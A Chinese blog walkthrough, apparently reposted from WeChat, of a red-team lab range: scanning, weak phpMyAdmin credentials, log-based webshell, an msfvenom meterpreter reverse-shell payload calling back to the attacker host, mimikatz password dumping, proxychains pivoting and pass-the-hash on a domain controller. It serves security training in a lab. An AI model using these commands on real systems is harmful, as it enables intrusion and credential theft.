一、环境配置
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2
攻击示意图:
靶机统一使用虚拟机搭建
web服务器:windows7 ip:192.168.52.143/192.168.154.152
域成员:windows server 2003 ip:192.168.52.141
域控:windows server 2008 ip:192.168.52.138
攻击机:kali ip:192.168.154.146
二、外网打点
nmap扫描ip,看一下开了哪些端口
开了80和3306,访问80
是个探针,知道网站路径和php版本信息
上dirsearch扫一下目录
有phpMyAdmin
试下弱口令,root/root进去了
然后就是getshell,这里参考:https://cloud.tencent.com/developer/article/1540506,用的是日志getshell
写完shell蚁剑连上去,成功getshell
三、内网渗透
1、用msf生成exe上线,联动cs
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.154.146 LPORT=4444 -f exe -o shell.exe
msf设置
通过蚁剑上传木马,执行
成功得到session
打开cs,设置监听器
在msf中使用exploit/windows/local/payload_inject模块,session设置为刚获得的session
set payload windows/meterpreter/reverse_http
执行,cs成功上线
2、信息收集
(1)mimikatz提取账号明文密码
![ATT&CK红队实战靶场初探(一) ATT&CK红队实战靶场初探(一)]()
(2)post/windows/gather/enum_applications模块获取软件列表
(3)get_local_subnets获取子网信息+内网流量转发(msf+proxychains)
![ATT&CK红队实战靶场初探(一) ATT&CK红队实战靶场初探(一)]()
获得内网网段为192.168.52.0/24
run autoroute -s 192.168.52.0/24
添加路由让msf可以扫描网段
msf运行socks4a模块,并且修改/etc/proxychains.conf的最后一行为相对应的代理端口
(4)arp扫描内网存活主机
(5)PTH攻击拿下域控
这里也有许多干货喔
↓↓↓
↑↑↑
欢迎关注(排名不分先后)
本文始发于微信公众号(F12sec):ATT&CK红队实战靶场初探(一)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论